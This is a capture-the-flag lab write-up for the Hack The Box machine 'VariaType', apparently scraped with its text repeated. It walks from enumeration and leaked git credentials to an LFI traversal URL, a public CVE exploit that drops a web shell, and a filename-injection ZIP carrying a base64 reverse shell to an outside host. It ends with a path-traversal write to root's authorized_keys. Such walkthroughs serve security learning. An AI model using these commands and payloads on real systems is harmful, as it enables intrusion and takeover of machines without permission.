VariaType Medium Linux

Initial Enumeration

We begin with a standard network scan using Nmap to identify open ports and services running on the target.

                        TEXT
                        
                            PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u7 (protocol 2.0)
80/tcp open  http    nginx 1.22.1

From this scan, we can conclude:

The target is running a Linux-based system
SSH is exposed on port 22, likely for remote access
A web server (nginx 1.22.1) is running on port 80

Since web services are often the primary attack surface in Hack The Box machines, we proceed with web enumeration.

Web Enumeration

Accessing the main website at:

TEXT

http://variatype.htb

reveals a landing page for VariaType Labs, which appears to be a variable font generation platform.

The application explicitly allows users to upload .designspace files:

“Generate production-ready variable fonts from your .designspace…”

This is immediately interesting from an attacker’s perspective because file upload functionality is a high-risk attack surface, especially when dealing with structured formats like XML.

Vulnerability Research

Based on the functionality of the application, research into known vulnerabilities related to font processing libraries led to the discovery of:

CVE-2025-66034 — fonttools varLib (Critical)

This vulnerability affects the fonttools library, specifically the varLib module used for handling .designspace files.

Impact:

A malicious .designspace file can:

Perform path traversal, allowing arbitrary file writes
Inject malicious XML content
Potentially lead to Remote Code Execution (RCE)

Relevance to Target:

This vulnerability is highly relevant because:

The application accepts .designspace uploads
It likely processes them server-side using fonttools
If unsanitized, this creates a direct path to exploitation

Subdomain Enumeration

To expand the attack surface, subdomain fuzzing was performed using ffuf:

                        TEXT
                        
                            ffuf -u http://variatype.htb -H "Host: FUZZ.variatype.htb" -w subdomains-top1million-5000.txt

This revealed a new subdomain:

TEXT

portal.variatype.htb

This is significant, as development portals or internal panels often expose additional functionality or vulnerabilities.

Directory Enumeration

Next, directory brute-forcing was performed on the newly discovered subdomain:

                        TEXT
                        
                            feroxbuster -u http://portal.variatype.htb/

This revealed a critical finding:

TEXT

/.git/

The presence of an exposed .git directory is a serious misconfiguration, as it can allow attackers to reconstruct the entire source code of the application.

Key findings include:

                        TEXT
                        
                            .git/index
.git/config
.git/HEAD
.git/objects/

This indicates that the repository is fully accessible.

Git Repository Exposure

At this stage, the next logical step is to dump the Git repository and analyze the source code for:

Hardcoded credentials
Hidden endpoints
Insecure logic
Vulnerable file handling mechanisms

Git Repository Analysis

                        JSX
                        
                            ./gitdumper.sh http://portal.variatype.htb/.git/ /home/cypher/Desktop/HTB/variatype

After successfully dumping the exposed .git directory, the repository was reconstructed locally and inspected using standard Git commands.

BASH

                            git log
git show <commit>
                        

The commit history revealed two commits:

BASH

                            * 753b5f5 fix: add gitbot user for automated validation pipeline
* 5030e79 feat: initial portal implementation
                        

The most important finding comes from analyzing the latest commit:

BASH

git show 753b5f5

This reveals a modification in auth.php:

                        PHP
                        
                            $USERS = [
    'gitbot' => 'G1tB0t_Acc3ss_2025!'
];

Critical Finding: Hardcoded Credentials

The developers introduced a user for an automated validation pipeline, but mistakenly committed credentials directly into the source code.

Extracted credentials:

TEXT

                            Username: gitbot
Password: G1tB0t_Acc3ss_2025!
                        

This is a classic example of sensitive information disclosure via exposed Git repositories.

Authentication and Portal Access

Using the discovered credentials, authentication was performed on the portal:

TEXT

http://portal.variatype.htb

Successful login grants access to the Validation Dashboard.

The dashboard indicates:

It is used to monitor font generation jobs
Files are auto-archived from the main generator pipeline
No current builds are present

This confirms that the portal is part of a backend processing pipeline, likely interacting with the .designspace upload functionality identified earlier.

Further Enumeration of Portal

To better understand the application structure, additional directory fuzzing was performed with PHP extensions:

BASH

feroxbuster -u http://portal.variatype.htb/ -x php

Observations:

/dashboard.php → Redirects if not authenticated (confirms access control)
/download.php → Likely used to retrieve generated font files
/view.php → Possibly used to preview processed data
/files/ → Storage location for generated or uploaded files

The presence of these endpoints strongly suggests a file processing workflow, where:

A .designspace file is uploaded
It is processed by the backend pipeline
Output files are stored and made accessible via /files/

Exploiting File Download Functionality (LFI)

While enumerating the available endpoints, accessing /download.php without parameters returns:

TEXT

File parameter required.

This indicates that the endpoint expects a file parameter, which is a strong candidate for Local File Inclusion (LFI) testing.

Testing for path traversal:

                        TEXT
                        
                            http://portal.variatype.htb/download.php?f=....//....//....//....//....//....//etc/passwd

The application successfully returned sensitive system files such as /etc/passwd, confirming:

Vulnerability Identified: Path Traversal (LFI)

No proper sanitization on f parameter
Directory traversal (..//) is possible
Arbitrary file read is achievable

This provides an alternative path to sensitive data exposure, though in this case, a more direct RCE path was available.

Achieving Remote Code Execution (CVE-2025-66034)

Exploitation Using Public PoC

https://github.com/symphony2colour/varlib-cve-2025-66034

A public exploit for this CVE was used to automate the process:

BASH

                            python3 varlib_cve_2025_66034.py \
  --ip 10.10.10.10 \
  --port 6666 \
  --path /var/www/portal.variatype.htb/public/files \
  --trigger http://portal.variatype.htb/files \
  --url http://variatype.htb/tools/variable-font-generator/process
                        

What this does:

Generates a malicious .designspace file
Uploads it to the vulnerable endpoint
Writes a PHP web shell to disk
Triggers the shell
Establishes a reverse connection

Reverse Shell Obtained

Shell received:

BASH

                            www-data@variatype:~/portal.variatype.htb/public/files$ whoami
www-data
                        

At this point, we have initial access as www-data.

Post-Exploitation Enumeration

Navigating the system revealed an interesting directory:

BASH

/opt

Contents:

BASH

process_client_submissions.bak

This script appears to be part of the font processing pipeline.

Analyzing the Backup Script

The script contains:

BASH

SAFE_NAME_REGEX='^[a-zA-Z0-9._-]+$'

It enforces a filename restriction:

Only allows:
- Letters
- Numbers
- . _ -

However, further analysis reveals a critical issue:

Vulnerability: Command Injection via Filename

The script processes files using:

BASH

                            fontforge -lang=py -c "
import fontforge
font = fontforge.open('$file')
"
                        

Here, $file is embedded directly into a Python command string.

Even though a regex is applied, it does not fully prevent command injection, especially when filenames are interpreted in shell or embedded contexts.

Exploitation via Malicious Archive

A Python script was created to generate a malicious ZIP archive:

                        PYTHON
                        
                            import zipfile

payload = "L2Jpbi9zaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNy42Ny82NjY2IDA+JjE="

filename = f"$(echo {payload} | base64 -d | bash).ttf"

with zipfile.ZipFile("exploit.zip", "w") as z:
    z.writestr(filename, "dummy")

Key Idea:

Filename contains command substitution:

BASH

$(...)

Payload is base64 encoded reverse shell
When processed, the command gets executed

Delivering the Payload

The malicious archive was transferred to the server:

BASH

                            wget http://10.10.10.10:8000/exploit.zip -O /var/www/portal.variatype.htb/public/files/exploit.zip
                        

Privilege Escalation to `steve`

A listener was started:

BASH

nc -lnvp 6666

Upon processing the malicious file, a shell was received:

BASH

                            $ whoami
steve
                        

Upgraded shell:

BASH

python3 -c 'import pty;pty.spawn("/bin/bash")'

Now we have a fully interactive shell as:

TEXT

steve@variatype:~$

Privilege Escalation to Root

After obtaining a stable shell as steve, the next step is to check for sudo privileges:

BASH

sudo -l

Output:

                        TEXT
                        
                            (root) NOPASSWD: /usr/bin/python3 /opt/font-tools/install_validator.py *

This indicates that the user steve can execute a Python script as root without a password, which is a strong privilege escalation vector.

Analyzing the Vulnerable Script

The script:

BASH

/opt/font-tools/install_validator.py

Key functionality:

Accepts a URL as input
Downloads the file using:

PYTHON

                            from setuptools.package_index import PackageIndex
index.download(plugin_url, PLUGIN_DIR)
                        

Critical Issue

The script does:

PYTHON

downloaded_path = index.download(plugin_url, PLUGIN_DIR)

Where:

TEXT

PLUGIN_DIR = "/opt/font-tools/validators"

However:

The URL is user-controlled
No restriction on final write location
URL encoding can be used to manipulate paths

This introduces a path traversal via URL → arbitrary file write as root

Exploitation Strategy

Goal:

Write our SSH public key into:

TEXT

/root/.ssh/authorized_keys

This allows direct SSH access as root.

Step 1: Generate SSH Key Pair

BASH

ssh-keygen -t ed25519 -f root_key

Files created:

TEXT

                            root_key
root_key.pub
                        

Step 2: Host Public Key

A simple HTTP server is created to serve the public key.

`serve.py`

                        PYTHON
                        
                    

                            from http.server import BaseHTTPRequestHandler, HTTPServer

KEY = open("key.txt", "rb").read()

class H(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(KEY)))
        self.end_headers()
        self.wfile.write(KEY)

    def log_message(self, *args):
        pass

HTTPServer(("0.0.0.0", 8000), H).serve_forever()
                        

Run server:

BASH

python3 serve.py

Step 3: Exploit Path Traversal in Installer

Execute:

BASH

                            sudo /usr/bin/python3 /opt/font-tools/install_validator.py \
"http://ATTACKER_IP:8000/%2froot%2f.ssh%2fauthorized_keys"
                        

Why This Works

%2f = / (URL-encoded slash)
The downloader resolves the path as:

TEXT

/root/.ssh/authorized_keys

The file is written as root
Contents = attacker’s public key

Output confirms:

TEXT

Plugin installed at: /root/.ssh/authorized_keys

Step 4: SSH as Root

BASH

ssh root@variatype.htb -i root_key

Successful login:

BASH

                            root@variatype:~# whoami
root
                        

Root Flag

BASH

cat /root/root.txt

VariaType Medium Linux

Initial Enumeration

We begin with a standard network scan using Nmap to identify open ports and services running on the target.

                        TEXT
                        
                            PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u7 (protocol 2.0)
80/tcp open  http    nginx 1.22.1

From this scan, we can conclude:

The target is running a Linux-based system
SSH is exposed on port 22, likely for remote access
A web server (nginx 1.22.1) is running on port 80

Since web services are often the primary attack surface in Hack The Box machines, we proceed with web enumeration.

Web Enumeration

Accessing the main website at:

TEXT

http://variatype.htb

reveals a landing page for VariaType Labs, which appears to be a variable font generation platform.

The application explicitly allows users to upload .designspace files:

“Generate production-ready variable fonts from your .designspace…”

This is immediately interesting from an attacker’s perspective because file upload functionality is a high-risk attack surface, especially when dealing with structured formats like XML.

Vulnerability Research

Based on the functionality of the application, research into known vulnerabilities related to font processing libraries led to the discovery of:

CVE-2025-66034 — fonttools varLib (Critical)

This vulnerability affects the fonttools library, specifically the varLib module used for handling .designspace files.

Impact:

A malicious .designspace file can:

Perform path traversal, allowing arbitrary file writes
Inject malicious XML content
Potentially lead to Remote Code Execution (RCE)

Relevance to Target:

This vulnerability is highly relevant because:

The application accepts .designspace uploads
It likely processes them server-side using fonttools
If unsanitized, this creates a direct path to exploitation

Subdomain Enumeration

To expand the attack surface, subdomain fuzzing was performed using ffuf:

                        TEXT
                        
                            ffuf -u http://variatype.htb -H "Host: FUZZ.variatype.htb" -w subdomains-top1million-5000.txt

This revealed a new subdomain:

TEXT

portal.variatype.htb

This is significant, as development portals or internal panels often expose additional functionality or vulnerabilities.

Directory Enumeration

Next, directory brute-forcing was performed on the newly discovered subdomain:

                        TEXT
                        
                            feroxbuster -u http://portal.variatype.htb/

This revealed a critical finding:

TEXT

/.git/

The presence of an exposed .git directory is a serious misconfiguration, as it can allow attackers to reconstruct the entire source code of the application.

Key findings include:

                        TEXT
                        
                            .git/index
.git/config
.git/HEAD
.git/objects/

This indicates that the repository is fully accessible.

Git Repository Exposure

At this stage, the next logical step is to dump the Git repository and analyze the source code for:

Hardcoded credentials
Hidden endpoints
Insecure logic
Vulnerable file handling mechanisms

Git Repository Analysis

                        JSX
                        
                            ./gitdumper.sh http://portal.variatype.htb/.git/ /home/cypher/Desktop/HTB/variatype

After successfully dumping the exposed .git directory, the repository was reconstructed locally and inspected using standard Git commands.

BASH

                            git log
git show <commit>
                        

The commit history revealed two commits:

BASH

                            * 753b5f5 fix: add gitbot user for automated validation pipeline
* 5030e79 feat: initial portal implementation
                        

The most important finding comes from analyzing the latest commit:

BASH

git show 753b5f5

This reveals a modification in auth.php:

                        PHP
                        
                            $USERS = [
    'gitbot' => 'G1tB0t_Acc3ss_2025!'
];

Critical Finding: Hardcoded Credentials

The developers introduced a user for an automated validation pipeline, but mistakenly committed credentials directly into the source code.

Extracted credentials:

TEXT

                            Username: gitbot
Password: G1tB0t_Acc3ss_2025!
                        

This is a classic example of sensitive information disclosure via exposed Git repositories.

Authentication and Portal Access

Using the discovered credentials, authentication was performed on the portal:

TEXT

http://portal.variatype.htb

Successful login grants access to the Validation Dashboard.

The dashboard indicates:

It is used to monitor font generation jobs
Files are auto-archived from the main generator pipeline
No current builds are present

This confirms that the portal is part of a backend processing pipeline, likely interacting with the .designspace upload functionality identified earlier.

Further Enumeration of Portal

To better understand the application structure, additional directory fuzzing was performed with PHP extensions:

BASH

feroxbuster -u http://portal.variatype.htb/ -x php

Observations:

/dashboard.php → Redirects if not authenticated (confirms access control)
/download.php → Likely used to retrieve generated font files
/view.php → Possibly used to preview processed data
/files/ → Storage location for generated or uploaded files

The presence of these endpoints strongly suggests a file processing workflow, where:

A .designspace file is uploaded
It is processed by the backend pipeline
Output files are stored and made accessible via /files/

Exploiting File Download Functionality (LFI)

While enumerating the available endpoints, accessing /download.php without parameters returns:

TEXT

File parameter required.

This indicates that the endpoint expects a file parameter, which is a strong candidate for Local File Inclusion (LFI) testing.

Testing for path traversal:

                        TEXT
                        
                            http://portal.variatype.htb/download.php?f=....//....//....//....//....//....//etc/passwd

The application successfully returned sensitive system files such as /etc/passwd, confirming:

Vulnerability Identified: Path Traversal (LFI)

No proper sanitization on f parameter
Directory traversal (..//) is possible
Arbitrary file read is achievable

This provides an alternative path to sensitive data exposure, though in this case, a more direct RCE path was available.

Achieving Remote Code Execution (CVE-2025-66034)

Exploitation Using Public PoC

https://github.com/symphony2colour/varlib-cve-2025-66034

A public exploit for this CVE was used to automate the process:

BASH

                            python3 varlib_cve_2025_66034.py \
  --ip 10.10.10.10 \
  --port 6666 \
  --path /var/www/portal.variatype.htb/public/files \
  --trigger http://portal.variatype.htb/files \
  --url http://variatype.htb/tools/variable-font-generator/process
                        

What this does:

Generates a malicious .designspace file
Uploads it to the vulnerable endpoint
Writes a PHP web shell to disk
Triggers the shell
Establishes a reverse connection

Reverse Shell Obtained

Shell received:

BASH

                            www-data@variatype:~/portal.variatype.htb/public/files$ whoami
www-data
                        

At this point, we have initial access as www-data.

Post-Exploitation Enumeration

Navigating the system revealed an interesting directory:

BASH

/opt

Contents:

BASH

process_client_submissions.bak

This script appears to be part of the font processing pipeline.

Analyzing the Backup Script

The script contains:

BASH

SAFE_NAME_REGEX='^[a-zA-Z0-9._-]+$'

It enforces a filename restriction:

Only allows:
- Letters
- Numbers
- . _ -

However, further analysis reveals a critical issue:

Vulnerability: Command Injection via Filename

The script processes files using:

BASH

                            fontforge -lang=py -c "
import fontforge
font = fontforge.open('$file')
"
                        

Here, $file is embedded directly into a Python command string.

Even though a regex is applied, it does not fully prevent command injection, especially when filenames are interpreted in shell or embedded contexts.

Exploitation via Malicious Archive

A Python script was created to generate a malicious ZIP archive:

                        PYTHON
                        
                            import zipfile

payload = "L2Jpbi9zaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNy42Ny82NjY2IDA+JjE="

filename = f"$(echo {payload} | base64 -d | bash).ttf"

with zipfile.ZipFile("exploit.zip", "w") as z:
    z.writestr(filename, "dummy")

Key Idea:

Filename contains command substitution:

BASH

$(...)

Payload is base64 encoded reverse shell
When processed, the command gets executed

Delivering the Payload

The malicious archive was transferred to the server:

BASH

                            wget http://10.10.10.10:8000/exploit.zip -O /var/www/portal.variatype.htb/public/files/exploit.zip
                        

Privilege Escalation to `steve`

A listener was started:

BASH

nc -lnvp 6666

Upon processing the malicious file, a shell was received:

BASH

                            $ whoami
steve
                        

Upgraded shell:

BASH

python3 -c 'import pty;pty.spawn("/bin/bash")'

Now we have a fully interactive shell as:

TEXT

steve@variatype:~$

Privilege Escalation to Root

After obtaining a stable shell as steve, the next step is to check for sudo privileges:

BASH

sudo -l

Output:

                        TEXT
                        
                            (root) NOPASSWD: /usr/bin/python3 /opt/font-tools/install_validator.py *

This indicates that the user steve can execute a Python script as root without a password, which is a strong privilege escalation vector.

Analyzing the Vulnerable Script

The script:

BASH

/opt/font-tools/install_validator.py

Key functionality:

Accepts a URL as input
Downloads the file using:

PYTHON

                            from setuptools.package_index import PackageIndex
index.download(plugin_url, PLUGIN_DIR)
                        

Critical Issue

The script does:

PYTHON

downloaded_path = index.download(plugin_url, PLUGIN_DIR)

Where:

TEXT

PLUGIN_DIR = "/opt/font-tools/validators"

However:

The URL is user-controlled
No restriction on final write location
URL encoding can be used to manipulate paths

This introduces a path traversal via URL → arbitrary file write as root

Exploitation Strategy

Goal:

Write our SSH public key into:

TEXT

/root/.ssh/authorized_keys

This allows direct SSH access as root.

Step 1: Generate SSH Key Pair

BASH

ssh-keygen -t ed25519 -f root_key

Files created:

TEXT

                            root_key
root_key.pub
                        

Step 2: Host Public Key

A simple HTTP server is created to serve the public key.

`serve.py`

                        PYTHON
                        
                    

                            from http.server import BaseHTTPRequestHandler, HTTPServer

KEY = open("key.txt", "rb").read()

class H(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(KEY)))
        self.end_headers()
        self.wfile.write(KEY)

    def log_message(self, *args):
        pass

HTTPServer(("0.0.0.0", 8000), H).serve_forever()
                        

Run server:

BASH

python3 serve.py

Step 3: Exploit Path Traversal in Installer

Execute:

BASH

                            sudo /usr/bin/python3 /opt/font-tools/install_validator.py \
"http://ATTACKER_IP:8000/%2froot%2f.ssh%2fauthorized_keys"
                        

Why This Works

%2f = / (URL-encoded slash)
The downloader resolves the path as:

TEXT

/root/.ssh/authorized_keys

The file is written as root
Contents = attacker’s public key

Output confirms:

TEXT

Plugin installed at: /root/.ssh/authorized_keys

Step 4: SSH as Root

BASH

ssh root@variatype.htb -i root_key

Successful login:

BASH

                            root@variatype:~# whoami
root
                        

Root Flag

BASH

cat /root/root.txt

VariaType Medium Linux

Initial Enumeration

Web Enumeration

Vulnerability Research

CVE-2025-66034 — fonttools varLib (Critical)

Impact:

Relevance to Target:

Subdomain Enumeration

Directory Enumeration

Git Repository Exposure

Git Repository Analysis

Critical Finding: Hardcoded Credentials

Authentication and Portal Access

Further Enumeration of Portal

Observations:

Exploiting File Download Functionality (LFI)

Vulnerability Identified: Path Traversal (LFI)

Achieving Remote Code Execution (CVE-2025-66034)

What this does:

Reverse Shell Obtained

Post-Exploitation Enumeration

Analyzing the Backup Script

Vulnerability: Command Injection via Filename

Exploitation via Malicious Archive

Key Idea:

Delivering the Payload

Privilege Escalation to steve

Privilege Escalation to Root

Analyzing the Vulnerable Script

Critical Issue

Exploitation Strategy

Step 1: Generate SSH Key Pair

Step 2: Host Public Key

serve.py

Step 3: Exploit Path Traversal in Installer

Why This Works

Step 4: SSH as Root

Root Flag

VariaType Medium Linux

Initial Enumeration

Web Enumeration

Vulnerability Research

CVE-2025-66034 — fonttools varLib (Critical)

Impact:

Relevance to Target:

Subdomain Enumeration

Directory Enumeration

Git Repository Exposure

Git Repository Analysis

Critical Finding: Hardcoded Credentials

Authentication and Portal Access

Further Enumeration of Portal

Observations:

Exploiting File Download Functionality (LFI)

Vulnerability Identified: Path Traversal (LFI)

Achieving Remote Code Execution (CVE-2025-66034)

What this does:

Reverse Shell Obtained

Post-Exploitation Enumeration

Analyzing the Backup Script

Vulnerability: Command Injection via Filename

Exploitation via Malicious Archive

Key Idea:

Delivering the Payload

Privilege Escalation to steve

Privilege Escalation to Root

Analyzing the Vulnerable Script

Critical Issue

Exploitation Strategy

Step 1: Generate SSH Key Pair

Step 2: Host Public Key

serve.py

Step 3: Exploit Path Traversal in Installer

Why This Works

Step 4: SSH as Root

Root Flag

Privilege Escalation to `steve`

`serve.py`

Privilege Escalation to `steve`

`serve.py`